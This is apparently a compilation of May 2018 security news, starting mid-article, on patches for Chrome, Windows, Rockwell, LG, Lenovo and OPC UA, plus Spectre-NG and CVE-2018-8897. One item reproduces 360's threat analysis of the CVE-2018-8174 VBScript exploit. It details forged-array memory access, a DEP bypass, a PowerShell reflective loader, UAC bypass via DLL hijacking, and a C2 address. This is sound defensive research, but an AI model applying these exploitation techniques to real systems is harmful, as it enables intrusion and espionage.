Another vulnerability resolved in the new browser iteration is CVE-2018-6120, a heap buffer overflow in PDFium reported by Zhou Aiting of Qihoo 360 Vulcan Team. The security researcher received a $5,000 reward for the finding.

The updated browser is available for download as version 66.0.3359.170 for Windows, Mac, and Linux devices.

This is the second time Google patches a Critical bug in Chrome 66 since the browser’s release in the stable channel less than a month ago.

In late April, the Internet giant addressed a use-after-free in Media Cache that could be exploited by a malicious actor to cause denial of service and possibly execute arbitrary code. The bug was reported by security researcher Ned Williamson, who received a $10,500 reward for the discovery.

The first stable release of Chrome 66 arrived with fixes for 62 security vulnerabilities, including two use after free in Disk Cache rated Critical severity (CVE-2018-6085 and CVE-2018-6086). Both issues were reported by Ned Williamson.


Rockwell Automation Patches Flaws in Simulation, Licensing Tools
11.5.2018 securityweek
Vulnerebility

Rockwell Automation has released updates for its Arena and FactoryTalk Activation Manager products to address various types of vulnerabilities, including a critical flaw that can allow remote code execution.

Both ICS-CERT and Rockwell Automation have released advisories describing the security holes and mitigations, but the vendor's advisories are only available to registered users.

FactoryTalk Activation Manager, a tool designed for managing licensed content and activating Rockwell software products, uses the Wibu-Systems CodeMeter and FlexNet Publisher license management applications.

Wibu-Systems CodeMeter is affected by a cross-site scripting (XSS) vulnerability that can be exploited to inject arbitrary code via a field in a configuration file, allowing attackers to access sensitive information or alter the impacted HTML page. The issue is tracked as CVE-2017-13754 and is considered low severity.

FlexNet Publisher, on the other hand, is affected by a critical buffer overflow (CVE-2015-8277) that can allow a remote attacker to execute arbitrary code.

"A custom string copying function of Imgrd.exe (the license server manager in FlexNet Publisher) and flexsvr.exe does not use proper bounds checking on incoming data, potentially allowing a remote, unauthenticated user to send crafted messages with the intent of causing a buffer overflow," Rockwell said in its advisory.

The vulnerabilities impact FactoryTalk Activation Manager 4.00.02 and 4.01, which include Wibu-Systems CodeMeter v6.50b and earlier, and FactoryTalk Activation Manager v4.00.02 and earlier, which include FlexNet Publisher v11.11.1.1 and earlier.

FactoryTalk Automation Manager is used by more than two dozen Rockwell products – users can consult a list provided by the vendor and ICS-CERT to see if they are affected. Updating Automation Manager to version 4.02 patches the vulnerabilities. Alternatively, CodeMeter can be updated to a compatible version.

Separate advisories published recently by Rockwell and ICS-CERT describe a medium severity denial-of-service (DoS) vulnerability affecting Arena, a simulation software for the manufacturing sector. Arena is designed to help organizations identify process bottlenecks, evaluate process changes, improve logistics, and increase throughput.

Researcher Ariele Caltabiano informed Rockwell through Trend Micro’s Zero Day Initiative (ZDI) that Arena is affected by a use-after-free vulnerability that can be exploited to crash the software by convincing the targeted user to open a specially crafted file. Crashing the application could lead to the user losing unsaved data.

Rockwell says the flaw, tracked as CVE-2018-8843, affects Arena Simulation Software for Manufacturing versions 15.10.00 and earlier, and it has been patched with the release of version 15.10.01.


Microsoft Issues Emergency Patch For Critical Flaw In Windows Containers
11.5.2018 thehackernews
Vulnerebility

Just a few days prior to its monthly patch release, Microsoft released an emergency patch for a critical vulnerability in the Windows Host Compute Service Shim (hcsshim) library that could allow remote attackers to run malicious code on Windows computers.
Windows Host Compute Service Shim (hcsshim) is an open source library that helps "Docker for Windows" execute Windows Server containers using a low-level container management API in Hyper-V.
Discovered by Swiss developer and security researcher Michael Hanselmann, the critical vulnerability (tracked as CVE-2018-8115) is the result of the failure of the hcsshim library to properly validate input when importing a Docker container image.
This, in turn, allows an attacker to remotely execute arbitrary code on the Windows host operating system, eventually letting the attacker create, remove, and replace files on the target host.
As Hanselmann explained in his personal blog, "Importing a Docker container image or pulling one from a remote registry isn't commonly expected to make modifications to the host file system outside of the Docker-internal data structures."
Hanselmann reported the issue to Microsoft in February this year, and the tech giant fixed the vulnerability a few days before this month’s patch Tuesday by releasing an updated version of hcsshim.
Although the vulnerability has been assigned a critical severity rating, Microsoft says exploitation of this issue is unlikely.
"To exploit the vulnerability, an attacker would place malicious code in a specially crafted container image which, if an authenticated administrator imported (pulled), could cause a container management service utilizing the Host Compute Service Shim library to execute malicious code on the Windows host," Microsoft says in its advisory.
The patch for this vulnerability addresses the way hcsshim validates input from Docker container images, therefore blocking the loading of malicious code in specially crafted files.
An updated version 0.6.10 of the Windows Host Compute Service Shim (hcsshim) file is available right now for download from GitHub.
Full details of the vulnerability have not been released yet, but Hanselmann promises to publish in-depth technical details and a proof-of-concept exploit for the flaw on May 9, following an agreement with Microsoft security response center.
Microsoft's May 2018 Patch Tuesday has been scheduled for release on May 8.


8 New Spectre-Class Vulnerabilities (Spectre-NG) Found in Intel CPUs
11.5.2018 thehackernews
Vulnerebility

A team of security researchers has reportedly discovered a total of eight new "Spectre-class" vulnerabilities in Intel CPUs, which also affect at least a small number of ARM processors and may impact AMD processor architecture as well.
Dubbed Spectre-Next Generation, or Spectre-NG, the partial details of the vulnerabilities were first leaked to journalists at German computer magazine Heise, which claims that Intel has classified four of the new vulnerabilities as "high risk" and remaining four as "medium."
The new CPU flaws reportedly originate from the same design issue that caused the original Spectre flaw, but the report claims one of the newly discovered flaws allows attackers with access to a virtual machine (VM) to easily target the host system, making it potentially more threatening than the original Spectre vulnerability.
"Alternatively, it could attack the VMs of other customers running on the same server. Passwords and secret keys for secure data transmission are highly sought-after targets on cloud systems and are acutely endangered by this gap," the report reads.
"However, the aforementioned Spectre-NG vulnerability can be exploited quite easily for attacks across system boundaries, elevating the threat potential to a new level. Cloud service providers such as Amazon or Cloudflare and, of course, their customers are particularly affected."
If you're unaware, Spectre vulnerability, which was reported earlier this year, relies upon a side-channel attack on a processors' speculative execution engine, allowing a malicious program to read sensitive information, like passwords, encryption keys, or sensitive information, including that of the kernel.
Although the German site did not disclose the name of the security researchers (or the team/company) who reported these flaws to Intel, it revealed one of the weaknesses was discovered by a security researcher at Google's Project Zero.
The site also claimed that the Google security researcher reported the flaw to the chip manufacturers almost 88 days ago—which indicates the researcher would possibly reveal the details of at least one flaw on May 7th, when the 90-day disclosure window will be closed, which is the day before the Windows Patch Tuesday.
Responsibly disclosing Spectre NG vulnerabilities to vendors is definitely a good practice, but it seems the researchers, who discovered the new series of Spectre-class flaws, are avoiding their names to come out early—maybe to prevent media criticism similar to the one faced by CTS Labs after they disclosed partial details of AMD flaws with dedicated website, beautiful graphics, and videos.
Intel's Response to Spectre-NG Flaws
Nevermind. When asked Intel about the new findings, the chip maker giant provides the following statement, which neither confirms nor denies the existence of the Spectre-NG vulnerabilities:
"Protecting our customers' data and ensuring the security of our products are critical priorities for us. We routinely work closely with customers, partners, other chip makers and researchers to understand and mitigate any issues that are identified, and part of this process involves reserving blocks of CVE numbers."
"We believe strongly in the value of coordinated disclosure and will share additional details on any potential issues as we finalize mitigations. As a best practice, we continue to encourage everyone to keep their systems up-to-date."
Meanwhile, when asked Heise about the Common Vulnerabilities and Exposures (CVE) numbers reserved for the new Spectre-NG vulnerabilities, the journalist refused to share any details and commented:
"The CVEs are currently only naked numbers without added value. On the other hand, their publication might have meant a further risk to our sources that we wanted to avoid. That's why we decided against it at the moment. We will submit the course, of course."
Brace For New Security Patches
The Spectre-NG vulnerabilities reportedly affect Intel CPUs, and there are also indications that at least some ARM processors are vulnerable to the issues, but the impact on AMD processors has yet to be confirmed.
According to the German site, Intel has already acknowledged the new Spectre-NG vulnerabilities and are planning to release security patches in who shifts—one in May and second is currently scheduled for August.
Microsoft also plans to fix the issues by releasing a security patch with Windows updates in the upcoming months.
However, it’s currently unknown if applying new patches would once again impact the performance of vulnerable devices, just like what happened with the original Spectre and Meltdown vulnerabilities earlier this year.


Microsoft Patches Two Zero-Day Flaws Under Active Attack
11.5.2018 thehackernews 
Attack  Vulnerebility 

It's time to gear up for the latest May 2018 Patch Tuesday.
Microsoft has today released security patches for a total of 67 vulnerabilities, including two zero-days that have actively been exploited in the wild by cybercriminals, and two publicly disclosed bugs.
In brief, Microsoft is addressing 21 vulnerabilities that are rated as critical, 42 rated important, and 4 rated as low severity.
These patch updates address security flaws in Microsoft Windows, Internet Explorer, Microsoft Edge, Microsoft Office, Microsoft Office Exchange Server, Outlook, .NET Framework, Microsoft Hyper-V, ChakraCore, Azure IoT SDK, and more.
1) Double Kill IE 0-day Vulnerability
The first zero-day vulnerability (CVE-2018-8174) under active attack is a critical remote code execution vulnerability that was revealed by Chinese security firm Qihoo 360 last month and affected all supported versions of Windows operating systems.
Dubbed "Double Kill" by the researchers, the vulnerability is notable and requires prompt attention as it could allow an attacker to remotely take control over an affected system by executing malicious code remotely through several ways, such as a compromised website, or malicious Office documents.
The Double Kill vulnerability is a use-after-free issue which resides in the way the VBScript Engine (included in all currently supported versions of Windows) handles objects in computer memory, allowing attackers to execute code that runs with the same system privileges as of the logged-in user.
"In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked 'safe for initialization' in an application or Microsoft Office document that hosts the IE rendering engine," Microsoft explains in its advisory.
"The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability."
Users with administrative rights on their systems are impacted more than the ones with limited rights, as an attacker successfully exploiting the vulnerability could take control of an affected system.

However, that doesn't mean that low-privileged users are spared. If users are logged in on an affected system with more limited rights, attackers may still be able to escalate their privileges by exploiting a separate vulnerability.
Researchers from Qihoo 360 and Kaspersky Labs found that the vulnerability was actively being exploited in the wild by an advanced state-sponsored hacking group in targeted attacks, but neither Microsoft nor Qihoo 360 and Kaspersky provided any information on the threat group.
2) Win32k Elevation of Privilege Vulnerability
The second zero-day vulnerability (CVE-2018-8120) patched this month is a privilege-escalation flaw that occurred in the Win32k component of Windows when it fails to properly handle objects in computer memory.
Successful exploitation of the flaw can allow attackers to execute arbitrary code in kernel mode, eventually allowing them to install programs or malware; view, edit or delete data; or create new accounts with full user rights.
The vulnerability is rated "important," and only affects Windows 7, Windows Server 2008 and Windows Server 2008 R2. The issue has actively been exploited by threat actors, but Microsoft did not provide any detail about the in-the-wild exploits.
Two Publicly Disclosed Flaws
Microsoft also addressed two "important" Windows vulnerabilities whose details have already been made public.
One of these is a Windows kernel flaw (CVE-2018-8141) that could lead to information disclosure, and the other is a Windows Image bug (CVE-2018-8170) that could lead to Elevation of Privilege.
In addition, the May 2018 updates resolve 20 more critical issues, including memory corruptions in the Edge and Internet Explorer (IE) scripting engines and remote code execution (RCE) vulnerabilities in Hyper-V and Hyper-V SMB.
Meanwhile, Adobe has also released its Patch Tuesday updates, addressing five security vulnerabilities—one critical bug in Flash Player, one critical and two important flaws in Creative Cloud and one important bug in Connect.
Users are strongly advised to install security updates as soon as possible in order to protect themselves against the active attacks in the wild.
For installing security updates, head on to Settings → Update & security → Windows Update → Check for updates, or you can install the updates manually.


Many Vulnerabilities Found in OPC UA Industrial Protocol
10.5.2018 securityweek
Vulnerebility

Researchers at Kaspersky Lab have identified a significant number of vulnerabilities in the OPC UA protocol, including flaws that could, in theory, be exploited to cause physical damage in industrial environments.

Developed and maintained by the OPC Foundation, OPC UA stands for Open Platform Communications Unified Automation. The protocol is widely used in industrial automation, including for control systems (ICS) and communications between Industrial Internet-of-Things (IIoT) and smart city systems.

Researchers at Kaspersky Lab, which is a member of the OPC Foundation consortium, have conducted a detailed analysis of OPC UA and discovered many vulnerabilities, including ones that can be exploited for remote code execution and denial-of-service (DoS) attacks.OPC Foundation patches 17 vulnerabilities in OPC UA protocol

There are several implementations of OPC UA, but experts focused on the OPC Foundation’s implementation – for which source code is publicly available – and third-party applications using the OPC UA Stack.

A total of 17 vulnerabilities have been identified in the OPC Foundation’s products and several flaws in commercial applications that use these products. Most of the issues were discovered through fuzzing.

Exploitation of the vulnerabilities depends on how the targeted network is configured, but in most cases, it will require access to the local network, Kaspersky researchers Pavel Cheremushkin and Sergey Temnikov told SecurityWeek in an interview at the company’s Security Analyst Summit in March. The experts said they had never seen a configuration that would allow attacks directly from the Internet.

An attacker first has to identify a service that uses OPC UA, and then send it a payload that triggers a DoS condition or remote code execution. Remote code execution vulnerabilities can be leveraged by attackers to move laterally within the network, control industrial processes, and to hide their presence. However, DoS attacks can have an even more significant impact in the case of industrial systems.

“In industrial systems, denial-of-service vulnerabilities pose a more serious threat than in any other software,” Cheremushkin and Temnikov wrote in a report published on Thursday. “Denial-of-service conditions in telemetry and telecontrol systems can cause enterprises to suffer financial losses and, in some cases, even lead to the disruption and shutdown of the industrial process. In theory, this could cause harm to expensive equipment and other physical damage.”

All the security holes were reported to the OPC Foundation and their respective developers and patches were released. Applying the patches is not difficult considering that the OPC Stack is a DLL file and updates are performed simply by replacing the old file with the new one.

The OPC Foundation has released advisories for the security holes discovered by Kaspersky researchers, but grouped all the issues under two CVE identifiers: CVE-2017-17433 and CVE-2017-12069. The latter also impacts automation and power distribution products from Siemens, which has also published an advisory.

“Based on our assessment, the current OPC UA Stack implementation not only fails to protect developers from trivial errors but also tends to provoke errors – we have seen this in real-world examples. Given today’s threat landscape, this is unacceptable for products as widely used as OPC UA. And this is even less acceptable for products designed for industrial automation systems,” researchers said.


LG Patches Serious Vulnerabilities in Smartphone Keyboard
10.5.2018 securityweek
Vulnerebility

Updates released this week by LG for its Android smartphones patch two high severity keyboard vulnerabilities that can be exploited for remote code execution.

The vulnerabilities were reported to LG late last year by Slava Makkaveev of Check Point Research. The electronics giant patched them with its May 2018 updates, which also include the latest security fixes released by Google for the Android operating system (security patch level 2018-05-01).

According to Check Point, the flaws affect the default keyboard (LG IME) shipped with all mainstream LG smartphones. Researchers successfully reproduced and exploited the security holes on LG G4, G5 and G6 devices.

An attacker could exploit the flaws to remotely execute arbitrary code with elevated privileges by manipulating the keyboard update process, specifically for the MyScript handwriting feature. Hackers can leverage the weaknesses to log keystrokes and capture credentials and other potentially sensitive data.

The first vulnerability is related to installing new languages or updating existing ones. The device obtains the necessary files from a hardcoded server over an HTTP connection, which allows a man-in-the-middle (MitM) attacker to deliver a malicious file instead of the legitimate update.

The second flaw can be exploited by an MitM attacker to control the location where a file is downloaded. A path traversal issue allows hackers to place a malicious file in the LG keyboard package sandbox by including the targeted location in the name of the file.

If the file is assigned a .so extension, it will be granted executable permissions. In order to get the keyboard app to load the malicious file, the attacker can appoint it as an “input method extension library” in the keyboard configuration file. The malware will be loaded as soon as the keyboard application is restarted.

LG noted in its advisory that the vulnerabilities only impact the MyScript handwriting feature.

Reports published last year showed that LG had a 20 percent market share in the U.S. and 4 percent globally. This means there are plenty of devices that hackers could target using the vulnerabilities discovered by Check Point. On the other hand, there are also many critical and high severity flaws in Android itself that hackers could try to exploit and those can pose a bigger risk considering that they could be weaponized against multiple Android smartphone brands.


Lenovo releases updates to fix Secure Boot flaw in servers and other issues
10.5.2018 securityaffairs 
Vulnerebility

Lenovo has released security patches that address the High severity vulnerability CVE-2017-3775 in the Secure Boot function on some System x servers.
The standard operator configurations disable signature checking, this means that some Server x BIOS/UEFI versions do not properly authenticate signed code before booting it.

“Lenovo internal testing discovered some System x server BIOS/UEFI versions that, when Secure Boot mode is enabled by a system administrator, do not properly authenticate signed code before booting it. As a result, an attacker with physical access to the system could boot unsigned code.” reads the security advisory.

“Lenovo ships these systems with Secure Boot disabled by default, because signed code is relatively new in the data center environment, and standard operator configurations disable signature checking.”

An attacker can exploit the vulnerability to execute unauthenticated code at the bootstrap of the affected system. The CVE-2017-3775 vulnerability impacts a dozen models, including Flex System x240 M5, x280 X6, x480 X6, x880, x3xxx series, and NeXtScale nx360 M5 devices.

Lenovo disclosed the complete list of impacted products and provided the related BIOS/UEFI update, it also explained that they ship with Secure Boot disabled by default.

Lenovo

Lenovo also issued a patch to address the CVE-2018-9063 buffer overflow in Lenovo System Update Drive Mapping Utility. -The flaw could be exploited by attackers for different kind of attacks, include the execution of arbitrary code on the target machine.

“MapDrv (C:\Program Files\Lenovo\System Update\mapdrv.exe) contains a local vulnerability where an attacker entering very large user ID or password can overrun the program’s buffer, causing undefined behaviors, such as execution of arbitrary code.” reads the security advisory.

“No additional privilege is granted to the attacker beyond what is already possessed to run MapDrv.”

The flaw could be easily exploited by an attacker entering very large user ID or password in order to overrun the program’s buffer. The attacker could potentially execute code with the MapDrv’s privileges.

Users need to update the application to Lenovo System Update version 5.07.0072 or later.

Users can launch Lenovo System Update to automatically checks for newer versions and accept the update if present, otherwise it is possible to manually update the application downloading the latest app version from the company website.


Analysis of CVE-2018-8174 VBScript 0day and APT actor related to Office targeted attack
10.5.2018 securityaffairs 
Vulnerebility

Recently, the Advanced Threat Response Team of 360 Core Security Division detected an APT attack exploiting a 0-day vulnerability tracked as CVE-2018-8174. Now the experts published a detailed analysis of the flaw.
I Overview
Recently, the Advanced Threat Response Team of 360 Core Security Division detected an APT attack exploiting a 0-day vulnerability and captured the world’s first malicious sample that uses a browser 0-day vulnerability. We codenamed the vulnerability as “double kill” exploit. This vulnerability affects the latest version of Internet Explorer and applications that use the IE kernel. When users browse the web or open Office documents, they are likely to be potential targets. Eventually the hackers will implant backdoor Trojan to completely control the computer. In response, we shared with Microsoft the relevant details of the 0day vulnerability in a timely manner. This APT attack was analyzed and attributed upon the detection and we now confirmed its association with the APT-C-06 Group.

On April 18, 2018, as soon as 360 Core Security detected the malicious activity, we contacted Microsoft without any delay and submitted relevant details to Microsoft. Microsoft confirmed this vulnerability on the morning of April 20th and released an official security patch on May 8th. Microsoft has fixed the vulnerability and named it CVE-2018-8174. After the vulnerability was properly resolved, we published this report on May 9th, along with further technical disclosure of the attack and the 0day.

II Affection in China
According to the sample data analysis, the attack affected regions in China are mainly distributed in provinces that actively involved in foreign trade activities.Victims include trade agencies and related organizations.

III Attack Procedure Analysis
The lure documents captured in this attack are in Yiddish. The attackers exploit office with OLE autolink objects (CVE-2017-0199) to embed the documents onto malicious websites. All the exploits and malicious payload were uploaded through remote servers.

Once victims opened the lure document, Word will firstly visit a remote website of IE vbscript 0day (CVE-2018-8174) to trigger the exploit. Afterward, Shellcode will be running to send several requests to get payload from remote servers. The payload will then be decrypted for further attack.

While the payload is running, Word will release three DLL backdoors locally. The backdoors will be installed and executed through PowerShell and rundll32. UAC bypass was used in this process, as well as file steganography and memory reflection uploading, in order to bypass traffic detection and to complete loading without any files.

IV IE VBScript 0day (CVE-2018-8174)
1. Timeline
On April 18, 2018, Advanced Threat Response Team of 360 Core Security Division detected a high-risk 0day vulnerabilities. The vulnerability affects the latest version of Internet Explorer and applications that use the IE kernel and has been found to be used for targeted APT attacks. On the same day, 360 immediately communicated with Microsoft and submitted details of the vulnerability to Microsoft. Microsoft confirmed this vulnerability on the morning of April 20th and released an official security patch on May 8th. The 0day vulnerability was fixed and it was named CVE-2018-8174.

CVE-2018-8174 is a remote code execution vulnerability of Windows VBScript engine. Attackers can embed malicious VBScript to Office document or website and then obtain the credential of the current user, whenever the user clicks, to execute arbitrary code.

2. Vulnerability Principles
Through the statistical analysis of the vulnerability samples, we found out that obfuscation was used massively. Therefore, we filtered out all the duplicated obfuscation and renamed all the identifiers.

Seeing from the POC created by using the exploit samples we captured, the principles of the exploit is obvious. The POC samples are as below:

Detailed procedures:

1) First create a cla1 instance assigned to b, and then assign value 0 to b, because at this point b’s referenced count is 1, causing cla1’s Class_Terminate function to be called.
2) In the Class_Terminate function, again assign b to c and assign 0 to b to balance the reference count.
3) After the Class_Terminate return, the memory pointed to by the b object will be released, so that a pointer to the memory data of the released object b is obtained.
4) If you use another object to occupy the freed memory, it will lead to the typical UAF or Type Confusion problem

3. Exploitation
The 0-day exploit exploits UAF multiple times to accomplish type confusion. It fakes and overrides the array object to perform arbitrary address reading and writing. In the end, it releases code to execute after constructing an object. Code execution does not use the traditional ROP or GodMod, but through the script layout Shellcode to stabilize the use.

Fake array to perform arbitrary address reading and writing
Mem members of 2 classes created by UAF are offset by 0x0c bytes, and an array of 0x7fffffff size is forged by reading and writing operation to the two mem members.

typedef struct tagSAFEARRAY {
USHORT cDims; // cDims = 0001
USHORT fFeatures; fFeatures =0x0880
ULONG cbElements; // the byte occupied by one element (1 byte)
ULONG cLocks;
PVOID pvData; // Buffer of data starts from 0x0
SAFEARRAYBOUND rgsabound[1];
} SAFEARRAY, *LPSAFEARRAY;

typedef struct tagSAFEARRAYBOUND {
ULONG cElements; // the number of elements (0x7fffffff, user space)
LONG lLbound; // the initial value of the index (starting from 0)
} SAFEARRAYBOUND, *LPSAFEARRAYBOUND;

A forged array composes of a one-dimensional array, the number of elements is 7fffffff, each element occupies 1 byte, and the element memory address is 0. So the accessible memory space for the array is from 0x00000000 to 0x7ffffffff*1. Therefore, the array can be read and written at any address. But the storage type of lIlIIl is string, so only by modifying the data type to 0x200C, i.e. VT_VARIANT|VT_ARRAY( array type), attackers can achieve their purpose.

Read the storage data of the specified parameter

In the malicious code, the above function is mainly used to read the data of the memory address specified by the parameter. The idea is to obtain the specified memory read capability via the characteristics of the first 4 bytes of the string address (namely, the content of the bstr, type, size field) returned by the lenb (bstr xx) in the vb (the data type in the VBS is bstr).

This is shown in the above code. If the input argument is addr(0x11223344), first add 4 to the value to get 0x11223348, and then set the variant type to 8 (string type). Next, call len function: if found to be BSTR type, vbscript will assume that the forward 4 bytes (0x11223344) is the address memory to store the length. So the len function will be executed and the value of the specified memory address will be returned.

Obtain Key DLL Base Address
The attacker leaks the virtual function table address of the CScriptEntryPoint object in the following way, which belongs to Vbscript.dll.

Obtain the vbscript.dll base address in the following way.

Because vbscript.dll imported msvcrt.dll, the msvcrt.dll base address was obtained by traversing the vbscript.dll import table, msvcrt.dll introduces kernelbase.dll, ntdll.dll, and finally the NtContinue, VirtualProtect function address was obtained.


Bypass DEP to execute shellcode
Use arbitrary reading and writing technique to modify the VAR type type to 0x4d, and then assign it with a value of 0 to make the virtual machine perform VAR:: Clear function.
Control with caution and let the code Execute function ntdll!ZwContinue. The first parameter CONTEXT structure was also constructed by the attacker.


Control the code with caution to execute ntdll! ZwContinue function. The first parameter CONTEXT structure is also carefully constructed by the attacker.
The first parameter of ZwContinue is a pointer to the CONTEXT structure. The CONTEXT structure is shown in the following figure, and the offset of EIP and ESP in CONTEXT can be calculated.

5. The values of the Eip and Esp in the actual runtime CONTEXT and the attacker’s intention are shown in the figure below.

V Powershell Payload
After the bait DOC file is executed, it will start to execute the Powershell command to the next step payload.

First of all, Powershell will fuzzy match incoming parameter names, and it is case-insensitive.

Second step, decrypt the obfuscated command.

Next, the script uses a special User-Agent access URL page to request the next load and execute.

The size of the requested payload file is approximately 199K. The code fragment is as follows.

 

We found that this code was modified from invoke-ReflectivePEInjection.ps1. buffer_x86 and buffer_x64 in the code are the same function but from different versions of dll files. File export module name: ReverseMet.dll.

DLL file decrypts ip address, port and sleep time from the configuration. After the decryption algorithm xor 0xA4, and subtracted 0x34, the code is as follows.

Decryption configuration file from the ip address 185.183.97.28 port 1021 to obtain the next load and execute.

 After it connects to the tcp port, it will get 4 bytes to apply for a memory.
Subsequent acquired writes into the new thread, and execute the acquired shellcode payload, Since the port of the sample CC server is closed, we cannot get the next load for analysis.

VI UAC Bypass Payload
In addition to use PowerShell to load the payload, the bait DOC file also runs rundll32.exe to execute another backdoor locally. There are several notable features of the backdoor program it uses: the program uses COM port to copy files, realize UAC bypass and two system DLL hijacks; it also uses the default DLLs of cliconfg.exe and SearchProtocolHost.exe to take advantage of whitelist; finally in the process of component delivery, use file steganography and memory reflection loading method to avoid traffic monitoring and achieve no file landing load.

1. Retro backdoor execution
The backdoor program used in this attack is actually the Retro series backdoor known to be used by the APT-C-06 organization. The following is a detailed analysis of the implementation process of the backdoor program.

First execute the DLL disguised as a zlib library function with rundll32 and execute the backdoor installation functions uncompress2 and uncompress3.

It uses a COM port for UAC bypass, copying its own DLL to the System32 path for DLL hijacking, and the hijacked targets are cliconfg.exe and SearchProtocolHost.exe


Copy the DLL file in the AppData directory to the System32 directory through the COM interface and name it msfte.dll and NTWDBLIB.dll.

Then copy the file NTWDBLIB.dll to the System directory and execute the system’s own cliconfig to achieve DLL hijacking and load NTWDBLIB.dll.

The role of NTWDBLIB.dll is to restart the system service WSearch, and then start msfte.dll.


The script will then generate and execute the MO4TH2H0.bat file in the TEMP directory, which will delete the NTWDBLIB.DLL and its own BAT from the system directory.

Msfte.dll is the final backdoor program whose export is disguised as zlib. The core export functions are AccessDebugTracer and AccessRetailTracer. Its main function is to communicate with CC and further download and execute subsequent DLL programs.

Similar to the previously analyzed sample, it is also using image steganography and memory reflection loading. The decrypted CC communication information is as follows:

The format of the request is:

Hxxp://CC_Address /s7/config.php ?p=M&inst=7917&name=

Among them, the parameter p is the current process authority, there are two types of M and H, inst parameter is the current installation id, name is the CC_name obtained by decryption, this time is pphp.

After decryption after downloading, the process is exactly the same as the format of the previous image steganography transmission.

For the CC URL corresponding to the test request, because we did not obtain the corresponding image during the analysis, the CC is suspected to have failed.

In the implementation process, Retro disguised fake SSH and fake zlib, intended to obfuscate and interfere with users and analysts. Retro’s attack method has been used since 2016.

2. Retro backdoor evolvement
The back door program used in the APT-C-06 organization’s early APT operation was Lucker. It is a set of self-developed and customized modular Trojans. The set of Trojans is powerful, with keyboard recording, voice recording, screen capture, file capture and U disk operation functions, etc. The Lucker ‘s name comes from the PDB path of this type of Trojan, because most of the backdoor’s function use the LK abbreviation.

In the middle to late period we have discovered its evolution and two different types of backdoor programs. We have named them Retro and Collector by the PDB path extracted from the program. The Retro backdoor is an evolution of the Lucker backdoor and it actives in a series of attacks from 2016 till now. The name comes from the pdb path of this type of Trojan with the label Retro, and also has the word Retro in the initial installer.

C:\workspace\Retro\DLL-injected-explorer\zlib1.pdb
C:\workspace\Retro\RetroDLL\zlib1.pdb

The evolution of the reflective DLL injection technique can be found from the relevant PDB paths, and there are a lot of variants of this series of backdoors.

VII Attribution
1. Decryption Algorithm
During the analysis, we found the decryption algorithm that malware used is identical to APT-C-06’s decryption algorithm.

In the further analysis, we found the same decryption algorithm was used in the 64-bit version of the relevant malware.

2. PDB Path
The PDB path of the malware used in this attack has a string of “Retro”. It is one specific feature of Retro Trojan family.

3. Victims
In the process of tracing victims, we found one special compromised machine. It has a large amount of malware related to APT-C-06. By looking at these samples in chronological order, the evolution of the malicious program can be clearly seen. The victim has been under constant attack acted by APT-C-06 since 2015. The early samples on the compromised machine could be associated with DarkHotel. Then it was attacked by Lurker Trojan. Recently it was under the attack exploiting 0-day vulnerabilities CVE-2018-8174.

VIII Conclusion
APT-C-06 is an overseas APT organization which has been active for a long time. Its main targets are China and some other countries. Its main purpose is to steal sensitive data and conduct cyber-espionage. DarkHotel can be regarded as one of its series of attack activities.
The attacks against China specifically targeted government, scientific research institutions and some particular field. The attacks can be dated back to 2007 and are still very active. Based on the evidence we have, the organization may be a hacker group or intelligence agency supported by a foreign government.
The attacks against China have never stopped over the past 10 years. The Techniques the group uses keep evolving through time. Based on the data we captured in 2017, targets in China are trade related institutions and concentrated in provinces that have frequent trading activities. The group has been conducting long-term monitoring on the targets to stole confidential data.
During the decades of cyber attacks, APT-C-06 exploits several 0-day vulnerabilities and used complicated malware. It has dozens of function modules and over 200 malicious codes.
In April, 2018, the Advanced Threat Response Team of 360 Core Security Division takes the lead in capturing the group’s new APT attack using 0-day vulnerabilities (CVE-2018-8174) in the wild, and then discovers the new type attack – Office related attack exploiting 0-day VBScript vulnerabilities.
After the capture of the new activity, we contacted Microsoft immediately and shared detailed information with them. Microsoft’s official security patch was released on 8th May. Now, we published this detailed report to disclose and analyze the attack.

Further technical details including IoCs are reported in the analysis published by 360 Core Security Team at the following URL:

http://blogs.360.cn/blog/cve-2018-8174-en/


Misinterpretation of Intel docs is the root cause for the CVE-2018-8897 flaw in Hypervisors and OSs
10.5.2018 securityaffairs 
Vulnerebility

Developers of major operating systems and hypervisors misread documentation from Intel and introduced a the CVE-2018-8897 vulnerability into to their products.
The development communities of major operating systems and hypervisors misread documentation from Intel and introduced a potentially serious vulnerability to their products.

The CERT/CC speculates the root cause of the flaw is the developers misinterpretation of existing documentation provided by chip manufacturers.

“The MOV SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction” states the advisory published by CERT/CC.

The flaw, tracked as CVE-2018-8897, relates the way the operating systems and hypervisors handle MOV/POP to SS instructions.

“In some circumstances, some operating systems or hypervisors may not expect or properly handle an Intel architecture hardware debug exception. The error appears to be due to developer interpretation of existing documentation for certain Intel architecture interrupt/exception instructions, namely MOV to SS and POP to SS.” continues the security advisory published by CERT/CC.

The CVE-2018-8897 flaw was discovered by the security experts Nick Peterson of Everdox Tech and Nemanja Mulasmajic of triplefault.io.

The CERT/CC published a security advisory to warn of the CVE-2018-8897 flaw that impact the Linux kernel and software developed by major tech firms including Apple, the DragonFly BSD Project, Red Hat, the FreeBSD Project, Microsoft, SUSE Linux, Canonical, VMware, and the Xen Project (CERT/CC published the complete list of companies whose products may be impacted)

An attacker needs local access to exploit the vulnerability and the impact depends on the specific vulnerable software. In the worst scenario, attackers can, potentially, gain access to sensitive memory information or control low-level operating system functions.

“Therefore, in certain circumstances after the use of certain Intel x86-64 architecture instructions, a debug exception pointing to data in a lower ring (for most operating systems, the kernel Ring 0 level) is made available to operating system components running in Ring 3.” continues the advisory.

“This may allow an attacker to utilize operating system APIs to gain access to sensitive memory information or control low-level operating system functions.”

Experts explained that in the case of Linux, the flaw can trigger a denial-of-service (DoS) condition or cause the crash of the kernel.

According to Microsoft, an attacker can exploit the security flaw on Windows for privilege escalation.

“An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.” reads the Microsoft’s kernel advisory

“To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.”

Security patches for CVE-2018-8897 flaw have been released for many OS, including the Linux kernel, Windows, Xen, and Red Hat.”

